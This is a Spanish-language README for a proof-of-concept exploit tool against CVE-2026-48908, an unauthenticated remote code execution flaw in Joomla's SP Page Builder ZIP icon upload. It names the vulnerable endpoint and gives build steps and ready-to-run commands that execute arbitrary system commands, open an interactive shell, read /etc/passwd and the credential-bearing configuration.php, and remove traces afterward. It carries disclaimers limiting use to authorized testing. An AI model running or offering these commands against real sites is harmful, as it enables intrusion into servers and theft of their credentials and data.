
CVE-2026-48908 - SP Page Builder Joomla RCE no autenticada
Exploit de Prueba de Concepto para CVE-2026-48908, una vulnerabilidad de Ejecución Remota de Código no autenticada en el componente SP Page Builder de Joomla.
CVE-2026-48908 es una vulnerabilidad de seguridad crítica que permite a atacantes no autenticados ejecutar código arbitrario en instalaciones vulnerables de Joomla mediante un manejo inadecuado de la extracción de archivos ZIP en el componente SP Page Builder.
| Propiedad | Detalle |
|---|---|
| ID CVE: | CVE-2026-48908 |
| Componente: | com_sppagebuilder |
| Versiones Vulnerables: | <= 6.6.1 |
| Versión Corregida: | 6.6.2 |
| Vector de Ataque: | Basado en red, no autenticado |
| Puntuación CVSS: | Crítica |
| Tipo de Vulnerabilidad: | Subida Arbitraria de Archivos / RCE por Extracción ZIP |
| Endpoint de Ataque: | index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon |
La vulnerabilidad existe en la funcionalidad de subida de activos donde la aplicación valida y extrae incorrectamente archivos ZIP que contienen activos de iconos. Un atacante puede crear un archivo ZIP malicioso con payloads PHP que se extraerán en un directorio accesible web, permitiendo la ejecución remota de código.
golang.org/x/term - Utilidades de terminal para entrada segura de contraseñasgit clone https://github.com/gagaltotal/CVE-2026-48908-SP-Page-Builder-Joomla
cd CVE-2026-48908-SP-Page-Builder-Joomla
go mod init CVE-2026-48908-SP-Page-Builder-Joomla
go mod download
or
go mod tidy
go build -o poc_tot poc_tot.go
Los binarios compilados están disponibles en la sección de lanzamientos.


./poc_tot -target http://target-site.com -cmd "whoami"
./poc_tot -target http://target-site.com -shell
./poc_tot -target http://target-site.com -check
./poc_tot -target http://target-site.com -cleanup
./poc_tot -target http://target-site.com -cmd "id" -token "your_joomla_token"
-target string
URL objetivo de la instalación vulnerable de Joomla (obligatorio)
Ejemplo: http://target.com o https://target.com
-cmd string
Comando del sistema a ejecutar en el objetivo
Ejemplo: "cat /etc/passwd"
-shell
Lanzar shell interactivo en el objetivo (requiere explotación exitosa)
-check
Verificar si el objetivo es vulnerable sin intentar la explotación
-cleanup
Eliminar shell y artefactos subidos del objetivo
-token string
Token CSRF para la explotación (opcional, se detecta automáticamente si no se proporciona)
La herramienta soporta múltiples vectores de explotación:
./poc_tot -target http://vulnerable.local -check
./poc_tot -target http://vulnerable.local -cmd "ls -la /var/www/html"
./poc_tot -target http://vulnerable.local -cmd "cat configuration.php"
./poc_tot -target http://vulnerable.local -shell
# In shell:
> id
> whoami
> pwd
./poc_tot -target http://vulnerable.local -cleanup
Si está ejecutando Joomla con el componente SP Page Builder:
Este software se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal. Los autores no aceptan responsabilidad por el mal uso o daños causados por esta herramienta. Los usuarios son responsables de asegurarse de tener la autorización adecuada antes de usar esta herramienta en cualquier sistema objetivo.
Al usar esta herramienta, usted reconoce que:
Esta herramienta está destinada únicamente a la investigación de seguridad defensiva y pruebas de penetración autorizadas. El acceso no autorizado a sistemas informáticos viola la Ley de Abuso y Fraude Informático y leyes similares en otras jurisdicciones. Obtenga siempre la autorización adecuada por escrito antes de realizar pruebas de seguridad.
index.php?option=com_installer&view=manageLas contribuciones a la investigación de seguridad son bienvenidas. Por favor:
GhostGTR666 (Gagaltotal666)
Para problemas, preguntas o contribuciones:
Este proyecto se proporciona tal cual para fines de investigación de seguridad. Revise las leyes locales relacionadas con herramientas de seguridad y pruebas de penetración antes de su uso.
Última actualización: 2026-06-24
Descargo de responsabilidad: Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas. El acceso no autorizado a sistemas informáticos es ilegal.